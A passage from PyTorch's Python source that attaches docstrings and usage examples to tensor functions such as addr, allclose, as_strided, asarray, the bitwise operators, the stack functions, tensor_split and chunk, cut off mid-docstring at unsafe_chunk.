For inputs of type `FloatTensor` or `DoubleTensor`, arguments :attr:`beta` and
:attr:`alpha` must be real numbers, otherwise they should be integers
Args:
input (Tensor): vector to be added
mat (Tensor): matrix to be matrix multiplied
vec (Tensor): vector to be matrix multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`mat @ vec` (:math:`\alpha`)
{out}
Example::
>>> M = torch.randn(2)
>>> mat = torch.randn(2, 3)
>>> vec = torch.randn(3)
>>> torch.addmv(M, mat, vec)
tensor([-0.3768, -5.5565])
""".format(**common_args))
add_docstr(torch.addr,
r"""
addr(input, vec1, vec2, *, beta=1, alpha=1, out=None) -> Tensor
Performs the outer-product of vectors :attr:`vec1` and :attr:`vec2`
and adds it to the matrix :attr:`input`.
Optional values :attr:`beta` and :attr:`alpha` are scaling factors on the
outer product between :attr:`vec1` and :attr:`vec2` and the added matrix
:attr:`input` respectively.
.. math::
\text{out} = \beta\ \text{input} + \alpha\ (\text{vec1} \otimes \text{vec2})
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
If :attr:`vec1` is a vector of size `n` and :attr:`vec2` is a vector
of size `m`, then :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a matrix of size
:math:`(n \times m)` and :attr:`out` will be a matrix of size
:math:`(n \times m)`.
Args:
input (Tensor): matrix to be added
vec1 (Tensor): the first vector of the outer product
vec2 (Tensor): the second vector of the outer product
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`\text{{vec1}} \otimes \text{{vec2}}` (:math:`\alpha`)
{out}
Example::
>>> vec1 = torch.arange(1., 4.)
>>> vec2 = torch.arange(1., 3.)
>>> M = torch.zeros(3, 2)
>>> torch.addr(M, vec1, vec2)
tensor([[ 1., 2.],
[ 2., 4.],
[ 3., 6.]])
""".format(**common_args))
add_docstr(torch.allclose,
r"""
allclose(input, other, rtol=1e-05, atol=1e-08, equal_nan=False) -> bool
This function checks if all :attr:`input` and :attr:`other` satisfy the condition:
.. math::
\lvert \text{input} - \text{other} \rvert \leq \texttt{atol} + \texttt{rtol} \times \lvert \text{other} \rvert
""" + r"""
elementwise, for all elements of :attr:`input` and :attr:`other`. The behaviour of this function is analogous to
`numpy.allclose <https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html>`_
Args:
input (Tensor): first tensor to compare
other (Tensor): second tensor to compare
atol (float, optional): absolute tolerance. Default: 1e-08
rtol (float, optional): relative tolerance. Default: 1e-05
equal_nan (bool, optional): if ``True``, then two ``NaN`` s will be considered equal. Default: ``False``
Example::
>>> torch.allclose(torch.tensor([10000., 1e-07]), torch.tensor([10000.1, 1e-08]))
False
>>> torch.allclose(torch.tensor([10000., 1e-08]), torch.tensor([10000.1, 1e-09]))
True
>>> torch.allclose(torch.tensor([1.0, float('nan')]), torch.tensor([1.0, float('nan')]))
False
>>> torch.allclose(torch.tensor([1.0, float('nan')]), torch.tensor([1.0, float('nan')]), equal_nan=True)
True
""")
add_docstr(torch.all,
r"""
all(input) -> Tensor
Tests if all elements in :attr:`input` evaluate to `True`.
.. note:: This function matches the behaviour of NumPy in returning
output of dtype `bool` for all supported dtypes except `uint8`.
For `uint8` the dtype of output is `uint8` itself.
Example::
>>> a = torch.rand(1, 2).bool()
>>> a
tensor([[False, True]], dtype=torch.bool)
>>> torch.all(a)
tensor(False, dtype=torch.bool)
>>> a = torch.arange(0, 3)
>>> a
tensor([0, 1, 2])
>>> torch.all(a)
tensor(False)
.. function:: all(input, dim, keepdim=False, *, out=None) -> Tensor
:noindex:
For each row of :attr:`input` in the given dimension :attr:`dim`,
returns `True` if all elements in the row evaluate to `True` and `False` otherwise.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.rand(4, 2).bool()
>>> a
tensor([[True, True],
[True, False],
[True, True],
[True, True]], dtype=torch.bool)
>>> torch.all(a, dim=1)
tensor([ True, False, True, True], dtype=torch.bool)
>>> torch.all(a, dim=0)
tensor([ True, False], dtype=torch.bool)
""".format(**single_dim_common))
add_docstr(torch.any,
r"""
any(input) -> Tensor
Tests if any element in :attr:`input` evaluates to `True`.
.. note:: This function matches the behaviour of NumPy in returning
output of dtype `bool` for all supported dtypes except `uint8`.
For `uint8` the dtype of output is `uint8` itself.
Example::
>>> a = torch.rand(1, 2).bool()
>>> a
tensor([[False, True]], dtype=torch.bool)
>>> torch.any(a)
tensor(True, dtype=torch.bool)
>>> a = torch.arange(0, 3)
>>> a
tensor([0, 1, 2])
>>> torch.any(a)
tensor(True)
.. function:: any(input, dim, keepdim=False, *, out=None) -> Tensor
:noindex:
For each row of :attr:`input` in the given dimension :attr:`dim`,
returns `True` if any element in the row evaluate to `True` and `False` otherwise.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.randn(4, 2) < 0
>>> a
tensor([[ True, True],
[False, True],
[ True, True],
[False, False]])
>>> torch.any(a, 1)
tensor([ True, True, True, False])
>>> torch.any(a, 0)
tensor([True, True])
""".format(**single_dim_common))
add_docstr(torch.angle,
r"""
angle(input, *, out=None) -> Tensor
Computes the element-wise angle (in radians) of the given :attr:`input` tensor.
.. math::
\text{out}_{i} = angle(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
.. note:: Starting in PyTorch 1.8, angle returns pi for negative real numbers,
zero for non-negative real numbers, and propagates NaNs. Previously
the function would return zero for all real numbers and not propagate
floating-point NaNs.
Example::
>>> torch.angle(torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j]))*180/3.14159
tensor([ 135., 135, -45])
""".format(**common_args))
add_docstr(torch.as_strided,
r"""
as_strided(input, size, stride, storage_offset=0) -> Tensor
Create a view of an existing `torch.Tensor` :attr:`input` with specified
:attr:`size`, :attr:`stride` and :attr:`storage_offset`.
.. warning::
Prefer using other view functions, like :meth:`torch.Tensor.expand`,
to setting a view's strides manually with `as_strided`, as this
function's behavior depends on the implementation of a tensor's storage.
The constructed view of the storage must only refer to elements within
the storage or a runtime error will be thrown, and if the view is
"overlapped" (with multiple indices referring to the same element in
memory) its behavior is undefined.
Args:
{input}
size (tuple or ints): the shape of the output tensor
stride (tuple or ints): the stride of the output tensor
storage_offset (int, optional): the offset in the underlying storage of the output tensor
Example::
>>> x = torch.randn(3, 3)
>>> x
tensor([[ 0.9039, 0.6291, 1.0795],
[ 0.1586, 2.1939, -0.4900],
[-0.1909, -0.7503, 1.9355]])
>>> t = torch.as_strided(x, (2, 2), (1, 2))
>>> t
tensor([[0.9039, 1.0795],
[0.6291, 0.1586]])
>>> t = torch.as_strided(x, (2, 2), (1, 2), 1)
tensor([[0.6291, 0.1586],
[1.0795, 2.1939]])
""".format(**common_args))
add_docstr(torch.as_tensor,
r"""
as_tensor(data, dtype=None, device=None) -> Tensor
Converts data into a tensor, sharing data and preserving autograd
history if possible.
If data is already a tensor with the requeseted dtype and device
then data itself is returned, but if data is a
tensor with a different dtype or device then it's copied as if using
`data.to(dtype=dtype, device=device)`.
If data is a NumPy array (an ndarray) with the same dtype and device then a
tensor is constructed using :func:`torch.from_numpy`.
.. seealso::
:func:`torch.tensor` never shares its data and creates a new "leaf tensor" (see :doc:`/notes/autograd`).
Args:
{data}
{dtype}
device (:class:`torch.device`, optional): the device of the constructed tensor. If None and data is a tensor
then the device of data is used. If None and data is not a tensor then
the result tensor is constructed on the CPU.
Example::
>>> a = numpy.array([1, 2, 3])
>>> t = torch.as_tensor(a)
>>> t
tensor([ 1, 2, 3])
>>> t[0] = -1
>>> a
array([-1, 2, 3])
>>> a = numpy.array([1, 2, 3])
>>> t = torch.as_tensor(a, device=torch.device('cuda'))
>>> t
tensor([ 1, 2, 3])
>>> t[0] = -1
>>> a
array([1, 2, 3])
""".format(**factory_data_common_args))
add_docstr(torch.asin, r"""
asin(input, *, out=None) -> Tensor
Returns a new tensor with the arcsine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \sin^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.5962, 1.4985, -0.4396, 1.4525])
>>> torch.asin(a)
tensor([-0.6387, nan, -0.4552, nan])
""".format(**common_args))
add_docstr(torch.arcsin, r"""
arcsin(input, *, out=None) -> Tensor
Alias for :func:`torch.asin`.
""")
add_docstr(torch.asinh,
r"""
asinh(input, *, out=None) -> Tensor
Returns a new tensor with the inverse hyperbolic sine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \sinh^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.1606, -1.4267, -1.0899, -1.0250 ])
>>> torch.asinh(a)
tensor([ 0.1599, -1.1534, -0.9435, -0.8990 ])
""".format(**common_args))
add_docstr(torch.arcsinh, r"""
arcsinh(input, *, out=None) -> Tensor
Alias for :func:`torch.asinh`.
""")
add_docstr(torch.atan, r"""
atan(input, *, out=None) -> Tensor
Returns a new tensor with the arctangent of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \tan^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.2341, 0.2539, -0.6256, -0.6448])
>>> torch.atan(a)
tensor([ 0.2299, 0.2487, -0.5591, -0.5727])
""".format(**common_args))
add_docstr(torch.arctan, r"""
arctan(input, *, out=None) -> Tensor
Alias for :func:`torch.atan`.
""")
add_docstr(torch.atan2,
r"""
atan2(input, other, *, out=None) -> Tensor
Element-wise arctangent of :math:`\text{{input}}_{{i}} / \text{{other}}_{{i}}`
with consideration of the quadrant. Returns a new tensor with the signed angles
in radians between vector :math:`(\text{{other}}_{{i}}, \text{{input}}_{{i}})`
and vector :math:`(1, 0)`. (Note that :math:`\text{{other}}_{{i}}`, the second
parameter, is the x-coordinate, while :math:`\text{{input}}_{{i}}`, the first
parameter, is the y-coordinate.)
The shapes of ``input`` and ``other`` must be
:ref:`broadcastable <broadcasting-semantics>`.
Args:
input (Tensor): the first input tensor
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.9041, 0.0196, -0.3108, -2.4423])
>>> torch.atan2(a, torch.randn(4))
tensor([ 0.9833, 0.0811, -1.9743, -1.4151])
""".format(**common_args))
add_docstr(torch.arctan2,
r"""
arctan2(input, other, *, out=None) -> Tensor
Alias for :func:`torch.atan2`.
""")
add_docstr(torch.atanh, r"""
atanh(input, *, out=None) -> Tensor
Returns a new tensor with the inverse hyperbolic tangent of the elements of :attr:`input`.
Note:
The domain of the inverse hyperbolic tangent is `(-1, 1)` and values outside this range
will be mapped to ``NaN``, except for the values `1` and `-1` for which the output is
mapped to `+/-INF` respectively.
.. math::
\text{out}_{i} = \tanh^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.randn(4).uniform_(-1, 1)
>>> a
tensor([ -0.9385, 0.2968, -0.8591, -0.1871 ])
>>> torch.atanh(a)
tensor([ -1.7253, 0.3060, -1.2899, -0.1893 ])
""".format(**common_args))
add_docstr(torch.arctanh, r"""
arctanh(input, *, out=None) -> Tensor
Alias for :func:`torch.atanh`.
""")
add_docstr(torch.asarray,
r"""
asarray(obj, *, dtype=None, device=None, copy=None, requires_grad=False) -> Tensor
Converts :attr:`obj` into a tensor, sharing data and preserving autograd history
if possible.
:attr:`obj` can be one of:
1. a tensor
2. a NumPy array
3. a DLPack capsule
4. a Python object that implements the buffer protocol
5. a Python sequence
For each of the mentioned options, in order, this functions will assume :attr:`obj`
is of that type and try, first, sharing memory. Only then, it will make a copy (if
necessary).
The dtype of the result tensor is inferred from the input object, except when
object is (4): an object that implements the buffer protocol (see :func:`torch.frombuffer`).
In that case, the buffer is interpreted as an array of bytes, which are grouped
according to the size of the given :attr:`dtype` or the global default
(see :func:`torch.set_default_tensor_type`) if `None` is given.
For example: NumPy arrays also implement the buffer protocol. However, since NumPy
arrays have higher priority than objects implementing the buffer protocol, this function
will handle them as NumPy arrays. In other words, it will infer its dtype as if using
``torch.from_numpy`` (instead of ``torch.frombuffer``).
.. seealso::
:func:`torch.as_tensor` tries to avoid copies for tensors and NumPy arrays.
:func:`torch.tensor` always copies the data from the input object.
:func:`torch.from_numpy` creates a tensor that shares its memory with a NumPy array.
:func:`torch.frombuffer` creates a tensor that shares its memory with an object
that implements the buffer protocol.
:func:`torch.utils.dlpack.from_dlpack` creates a tensor that shares its memory
with the object represented in the dlpack.
Args:
obj (object): a Python object that satisfies, at least, one of the five options
mentioned above.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, it will be inferred from :attr:`obj`.
copy (bool, optional): flags whether the object memory should be copied or not.
If ``None``, then the result tensor shares memory with the Python object
whenever possible. If ``True``, then the object memory is copied. If ``False``,
then the object memory is shared. If the object memory cannot be shared
and this flag is ``False``, then an error is thrown.
device (:class:`torch.device`, optional): the device of the constructed tensor.
If `None`, then the device of :attr:`obj` is used. Else, it either copies
the data, if :attr:`obj` lives in a different device, or it shares the
memory, if :attr:`obj` lives in the same device.
requires_grad (bool, optional): If autograd should record operations on the
returned tensor. However, if this flag is ``False`` and the input object
is a non-leaf :class:`Tensor`, this function will call :func:`torch.Tensor.detach`.
Example::
>>> a = torch.tensor([1, 2, 3])
>>> # Shares memory with tensor 'a'
>>> b = torch.asarray(a)
>>> a.data_ptr() == b.data_ptr()
True
>>> # Forces memory copy
>>> c = torch.asarray(a, copy=True)
>>> a.data_ptr() == c.data_ptr()
False
>>> a = torch.tensor([1, 2, 3], requires_grad=True).float()
>>> b = a + 2
>>> b
tensor([1., 2., 3.], grad_fn=<AddBackward0>)
>>> # Shares memory with tensor 'b', with no grad
>>> c = torch.asarray(b)
>>> c
tensor([1., 2., 3.])
>>> # Shares memory with tensor 'b', retaining autograd history
>>> d = torch.asarray(b, requires_grad=True)
>>> d
tensor([1., 2., 3.], grad_fn=<AddBackward0>)
>>> array = numpy.array([1, 2, 3])
>>> # Shares memory with array 'array'
>>> t1 = torch.asarray(array)
>>> array.__array_interface__['data'][0] == t1.data_ptr()
True
>>> # Copies memory due to dtype mismatch
>>> t2 = torch.asarray(array, dtype=torch.float32)
>>> array.__array_interface__['data'][0] == t1.data_ptr()
False
""")
add_docstr(torch.baddbmm,
r"""
baddbmm(input, batch1, batch2, *, beta=1, alpha=1, out=None) -> Tensor
Performs a batch matrix-matrix product of matrices in :attr:`batch1`
and :attr:`batch2`.
:attr:`input` is added to the final result.
:attr:`batch1` and :attr:`batch2` must be 3-D tensors each containing the same
number of matrices.
If :attr:`batch1` is a :math:`(b \times n \times m)` tensor, :attr:`batch2` is a
:math:`(b \times m \times p)` tensor, then :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a
:math:`(b \times n \times p)` tensor and :attr:`out` will be a
:math:`(b \times n \times p)` tensor. Both :attr:`alpha` and :attr:`beta` mean the
same as the scaling factors used in :meth:`torch.addbmm`.
.. math::
\text{out}_i = \beta\ \text{input}_i + \alpha\ (\text{batch1}_i \mathbin{@} \text{batch2}_i)
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
For inputs of type `FloatTensor` or `DoubleTensor`, arguments :attr:`beta` and
:attr:`alpha` must be real numbers, otherwise they should be integers.
{tf32_note}
Args:
input (Tensor): the tensor to be added
batch1 (Tensor): the first batch of matrices to be multiplied
batch2 (Tensor): the second batch of matrices to be multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`\text{{batch1}} \mathbin{{@}} \text{{batch2}}` (:math:`\alpha`)
{out}
Example::
>>> M = torch.randn(10, 3, 5)
>>> batch1 = torch.randn(10, 3, 4)
>>> batch2 = torch.randn(10, 4, 5)
>>> torch.baddbmm(M, batch1, batch2).size()
torch.Size([10, 3, 5])
""".format(**common_args, **tf32_notes))
add_docstr(torch.bernoulli,
r"""
bernoulli(input, *, generator=None, out=None) -> Tensor
Draws binary random numbers (0 or 1) from a Bernoulli distribution.
The :attr:`input` tensor should be a tensor containing probabilities
to be used for drawing the binary random number.
Hence, all values in :attr:`input` have to be in the range:
:math:`0 \leq \text{input}_i \leq 1`.
The :math:`\text{i}^{th}` element of the output tensor will draw a
value :math:`1` according to the :math:`\text{i}^{th}` probability value given
in :attr:`input`.
.. math::
\text{out}_{i} \sim \mathrm{Bernoulli}(p = \text{input}_{i})
""" + r"""
The returned :attr:`out` tensor only has values 0 or 1 and is of the same
shape as :attr:`input`.
:attr:`out` can have integral ``dtype``, but :attr:`input` must have floating
point ``dtype``.
Args:
input (Tensor): the input tensor of probability values for the Bernoulli distribution
Keyword args:
{generator}
{out}
Example::
>>> a = torch.empty(3, 3).uniform_(0, 1) # generate a uniform random matrix with range [0, 1]
>>> a
tensor([[ 0.1737, 0.0950, 0.3609],
[ 0.7148, 0.0289, 0.2676],
[ 0.9456, 0.8937, 0.7202]])
>>> torch.bernoulli(a)
tensor([[ 1., 0., 0.],
[ 0., 0., 0.],
[ 1., 1., 1.]])
>>> a = torch.ones(3, 3) # probability of drawing "1" is 1
>>> torch.bernoulli(a)
tensor([[ 1., 1., 1.],
[ 1., 1., 1.],
[ 1., 1., 1.]])
>>> a = torch.zeros(3, 3) # probability of drawing "1" is 0
>>> torch.bernoulli(a)
tensor([[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]])
""".format(**common_args))
add_docstr(torch.bincount,
r"""
bincount(input, weights=None, minlength=0) -> Tensor
Count the frequency of each value in an array of non-negative ints.
The number of bins (size 1) is one larger than the largest value in
:attr:`input` unless :attr:`input` is empty, in which case the result is a
tensor of size 0. If :attr:`minlength` is specified, the number of bins is at least
:attr:`minlength` and if :attr:`input` is empty, then the result is tensor of size
:attr:`minlength` filled with zeros. If ``n`` is the value at position ``i``,
``out[n] += weights[i]`` if :attr:`weights` is specified else
``out[n] += 1``.
Note:
{backward_reproducibility_note}
Arguments:
input (Tensor): 1-d int tensor
weights (Tensor): optional, weight for each value in the input tensor.
Should be of same size as input tensor.
minlength (int): optional, minimum number of bins. Should be non-negative.
Returns:
output (Tensor): a tensor of shape ``Size([max(input) + 1])`` if
:attr:`input` is non-empty, else ``Size(0)``
Example::
>>> input = torch.randint(0, 8, (5,), dtype=torch.int64)
>>> weights = torch.linspace(0, 1, steps=5)
>>> input, weights
(tensor([4, 3, 6, 3, 4]),
tensor([ 0.0000, 0.2500, 0.5000, 0.7500, 1.0000])
>>> torch.bincount(input)
tensor([0, 0, 0, 2, 2, 0, 1])
>>> input.bincount(weights)
tensor([0.0000, 0.0000, 0.0000, 1.0000, 1.0000, 0.0000, 0.5000])
""".format(**reproducibility_notes))
add_docstr(torch.bitwise_not,
r"""
bitwise_not(input, *, out=None) -> Tensor
Computes the bitwise NOT of the given input tensor. The input tensor must be of
integral or Boolean types. For bool tensors, it computes the logical NOT.
Args:
{input}
Keyword args:
{out}
Example:
>>> torch.bitwise_not(torch.tensor([-1, -2, 3], dtype=torch.int8))
tensor([ 0, 1, -4], dtype=torch.int8)
""".format(**common_args))
add_docstr(torch.bmm,
r"""
bmm(input, mat2, *, out=None) -> Tensor
Performs a batch matrix-matrix product of matrices stored in :attr:`input`
and :attr:`mat2`.
:attr:`input` and :attr:`mat2` must be 3-D tensors each containing
the same number of matrices.
If :attr:`input` is a :math:`(b \times n \times m)` tensor, :attr:`mat2` is a
:math:`(b \times m \times p)` tensor, :attr:`out` will be a
:math:`(b \times n \times p)` tensor.
.. math::
\text{out}_i = \text{input}_i \mathbin{@} \text{mat2}_i
""" + r"""
{tf32_note}
.. note:: This function does not :ref:`broadcast <broadcasting-semantics>`.
For broadcasting matrix products, see :func:`torch.matmul`.
Args:
input (Tensor): the first batch of matrices to be multiplied
mat2 (Tensor): the second batch of matrices to be multiplied
Keyword Args:
{out}
Example::
>>> input = torch.randn(10, 3, 4)
>>> mat2 = torch.randn(10, 4, 5)
>>> res = torch.bmm(input, mat2)
>>> res.size()
torch.Size([10, 3, 5])
""".format(**common_args, **tf32_notes))
add_docstr(torch.bitwise_and,
r"""
bitwise_and(input, other, *, out=None) -> Tensor
Computes the bitwise AND of :attr:`input` and :attr:`other`. The input tensor must be of
integral or Boolean types. For bool tensors, it computes the logical AND.
Args:
input: the first input tensor
other: the second input tensor
Keyword args:
{out}
Example:
>>> torch.bitwise_and(torch.tensor([-1, -2, 3], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([1, 0, 3], dtype=torch.int8)
>>> torch.bitwise_and(torch.tensor([True, True, False]), torch.tensor([False, True, False]))
tensor([ False, True, False])
""".format(**common_args))
add_docstr(torch.bitwise_or,
r"""
bitwise_or(input, other, *, out=None) -> Tensor
Computes the bitwise OR of :attr:`input` and :attr:`other`. The input tensor must be of
integral or Boolean types. For bool tensors, it computes the logical OR.
Args:
input: the first input tensor
other: the second input tensor
Keyword args:
{out}
Example:
>>> torch.bitwise_or(torch.tensor([-1, -2, 3], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([-1, -2, 3], dtype=torch.int8)
>>> torch.bitwise_or(torch.tensor([True, True, False]), torch.tensor([False, True, False]))
tensor([ True, True, False])
""".format(**common_args))
add_docstr(torch.bitwise_xor,
r"""
bitwise_xor(input, other, *, out=None) -> Tensor
Computes the bitwise XOR of :attr:`input` and :attr:`other`. The input tensor must be of
integral or Boolean types. For bool tensors, it computes the logical XOR.
Args:
input: the first input tensor
other: the second input tensor
Keyword args:
{out}
Example:
>>> torch.bitwise_xor(torch.tensor([-1, -2, 3], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([-2, -2, 0], dtype=torch.int8)
>>> torch.bitwise_xor(torch.tensor([True, True, False]), torch.tensor([False, True, False]))
tensor([ True, False, False])
""".format(**common_args))
add_docstr(torch.bitwise_left_shift,
r"""
bitwise_left_shift(input, other, *, out=None) -> Tensor
Computes the left arithmetic shift of :attr:`input` by :attr:`other` bits.
The result will have the same dtype as :attr:`input`.
The operation applied is:
.. math::
\text{{out}}_i = \text{{input}}_i \times 2 ^ {{\text{{other}}_i}}
Args:
input (Tensor or Scalar): the first input tensor
other (Tensor or Scalar): the second input tensor
Keyword args:
{out}
Example:
>>> torch.bitwise_left_shift(torch.tensor([-1, -2, 3], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([-2, -2, 24], dtype=torch.int8)
""".format(**common_args))
add_docstr(torch.bitwise_right_shift,
r"""
bitwise_right_shift(input, other, *, out=None) -> Tensor
Computes the right arithmetic shift of :attr:`input` by :attr:`other` bits.
The result will have the same dtype as :attr:`input`.
The operation applied is:
.. math::
\text{{out}}_i = \text{{input}}_i / 2 ^ {{\text{{other}}_i}}
Args:
input (Tensor or Scalar): the first input tensor
other (Tensor or Scalar): the second input tensor
Keyword args:
{out}
Example:
>>> torch.bitwise_right_shift(torch.tensor([-2, -7, 31], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([-1, -7, 3], dtype=torch.int8)
""".format(**common_args))
add_docstr(torch.broadcast_to,
r"""
broadcast_to(input, shape) -> Tensor
Broadcasts :attr:`input` to the shape :attr:`\shape`.
Equivalent to calling ``input.expand(shape)``. See :meth:`~Tensor.expand` for details.
Args:
{input}
shape (list, tuple, or :class:`torch.Size`): the new shape.
Example::
>>> x = torch.tensor([1, 2, 3])
>>> torch.broadcast_to(x, (3, 3))
tensor([[1, 2, 3],
[1, 2, 3],
[1, 2, 3]])
""".format(**common_args))
add_docstr(torch.stack,
r"""
stack(tensors, dim=0, *, out=None) -> Tensor
Concatenates a sequence of tensors along a new dimension.
All tensors need to be of the same size.
Arguments:
tensors (sequence of Tensors): sequence of tensors to concatenate
dim (int): dimension to insert. Has to be between 0 and the number
of dimensions of concatenated tensors (inclusive)
Keyword args:
{out}
""".format(**common_args))
add_docstr(torch.hstack,
r"""
hstack(tensors, *, out=None) -> Tensor
Stack tensors in sequence horizontally (column wise).
This is equivalent to concatenation along the first axis for 1-D tensors, and along the second axis for all other tensors.
Args:
tensors (sequence of Tensors): sequence of tensors to concatenate
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 2, 3])
>>> b = torch.tensor([4, 5, 6])
>>> torch.hstack((a,b))
tensor([1, 2, 3, 4, 5, 6])
>>> a = torch.tensor([[1],[2],[3]])
>>> b = torch.tensor([[4],[5],[6]])
>>> torch.hstack((a,b))
tensor([[1, 4],
[2, 5],
[3, 6]])
""".format(**common_args))
add_docstr(torch.vstack,
r"""
vstack(tensors, *, out=None) -> Tensor
Stack tensors in sequence vertically (row wise).
This is equivalent to concatenation along the first axis after all 1-D tensors have been reshaped by :func:`torch.atleast_2d`.
Args:
tensors (sequence of Tensors): sequence of tensors to concatenate
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 2, 3])
>>> b = torch.tensor([4, 5, 6])
>>> torch.vstack((a,b))
tensor([[1, 2, 3],
[4, 5, 6]])
>>> a = torch.tensor([[1],[2],[3]])
>>> b = torch.tensor([[4],[5],[6]])
>>> torch.vstack((a,b))
tensor([[1],
[2],
[3],
[4],
[5],
[6]])
""".format(**common_args))
add_docstr(torch.dstack,
r"""
dstack(tensors, *, out=None) -> Tensor
Stack tensors in sequence depthwise (along third axis).
This is equivalent to concatenation along the third axis after 1-D and 2-D tensors have been reshaped by :func:`torch.atleast_3d`.
Args:
tensors (sequence of Tensors): sequence of tensors to concatenate
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 2, 3])
>>> b = torch.tensor([4, 5, 6])
>>> torch.dstack((a,b))
tensor([[[1, 4],
[2, 5],
[3, 6]]])
>>> a = torch.tensor([[1],[2],[3]])
>>> b = torch.tensor([[4],[5],[6]])
>>> torch.dstack((a,b))
tensor([[[1, 4]],
[[2, 5]],
[[3, 6]]])
""".format(**common_args))
add_docstr(torch.tensor_split,
r"""
tensor_split(input, indices_or_sections, dim=0) -> List of Tensors
Splits a tensor into multiple sub-tensors, all of which are views of :attr:`input`,
along dimension :attr:`dim` according to the indices or number of sections specified
by :attr:`indices_or_sections`. This function is based on NumPy's
:func:`numpy.array_split`.
Args:
input (Tensor): the tensor to split
indices_or_sections (Tensor, int or list or tuple of ints):
If :attr:`indices_or_sections` is an integer ``n`` or a zero dimensional long tensor
with value ``n``, :attr:`input` is split into ``n`` sections along dimension :attr:`dim`.
If :attr:`input` is divisible by ``n`` along dimension :attr:`dim`, each
section will be of equal size, :code:`input.size(dim) / n`. If :attr:`input`
is not divisible by ``n``, the sizes of the first :code:`int(input.size(dim) % n)`
sections will have size :code:`int(input.size(dim) / n) + 1`, and the rest will
have size :code:`int(input.size(dim) / n)`.
If :attr:`indices_or_sections` is a list or tuple of ints, or a one-dimensional long
tensor, then :attr:`input` is split along dimension :attr:`dim` at each of the indices
in the list, tuple or tensor. For instance, :code:`indices_or_sections=[2, 3]` and :code:`dim=0`
would result in the tensors :code:`input[:2]`, :code:`input[2:3]`, and :code:`input[3:]`.
If indices_or_sections is a tensor, it must be a zero-dimensional or one-dimensional
long tensor on the CPU.
dim (int, optional): dimension along which to split the tensor. Default: ``0``
Example::
>>> x = torch.arange(8)
>>> torch.tensor_split(x, 3)
(tensor([0, 1, 2]), tensor([3, 4, 5]), tensor([6, 7]))
>>> x = torch.arange(7)
>>> torch.tensor_split(x, 3)
(tensor([0, 1, 2]), tensor([3, 4]), tensor([5, 6]))
>>> torch.tensor_split(x, (1, 6))
(tensor([0]), tensor([1, 2, 3, 4, 5]), tensor([6]))
>>> x = torch.arange(14).reshape(2, 7)
>>> x
tensor([[ 0, 1, 2, 3, 4, 5, 6],
[ 7, 8, 9, 10, 11, 12, 13]])
>>> torch.tensor_split(x, 3, dim=1)
(tensor([[0, 1, 2],
[7, 8, 9]]),
tensor([[ 3, 4],
[10, 11]]),
tensor([[ 5, 6],
[12, 13]]))
>>> torch.tensor_split(x, (1, 6), dim=1)
(tensor([[0],
[7]]),
tensor([[ 1, 2, 3, 4, 5],
[ 8, 9, 10, 11, 12]]),
tensor([[ 6],
[13]]))
""")
add_docstr(torch.chunk,
r"""
chunk(input, chunks, dim=0) -> List of Tensors
Attempts to split a tensor into the specified number of chunks. Each chunk is a view of
the input tensor.
.. note::
This function may return less then the specified number of chunks!
.. seealso::
:func:`torch.tensor_split` a function that always returns exactly the specified number of chunks
If the tensor size along the given dimesion :attr:`dim` is divisible by :attr:`chunks`,
all returned chunks will be the same size.
If the tensor size along the given dimension :attr:`dim` is not divisible by :attr:`chunks`,
all returned chunks will be the same size, except the last one.
If such division is not possible, this function may return less
than the specified number of chunks.
Arguments:
input (Tensor): the tensor to split
chunks (int): number of chunks to return
dim (int): dimension along which to split the tensor
Example::
>>> torch.arange(11).chunk(6)
(tensor([0, 1]),
tensor([2, 3]),
tensor([4, 5]),
tensor([6, 7]),
tensor([8, 9]),
tensor([10]))
>>> torch.arange(12).chunk(6)
(tensor([0, 1]),
tensor([2, 3]),
tensor([4, 5]),
tensor([6, 7]),
tensor([8, 9]),
tensor([10, 11]))
>>> torch.arange(13).chunk(6)
(tensor([0, 1, 2]),
tensor([3, 4, 5]),
tensor([6, 7, 8]),
tensor([ 9, 10, 11]),
tensor([12]))
""")
add_docstr(torch.unsafe_chunk,
r"""
unsafe_chunk(input, chunks, dim=0) -> List of Tensors
Works like :func:`torch.chunk` but without enforcing the autograd restrictions
on inplace modification of the outputs.
.. warning::
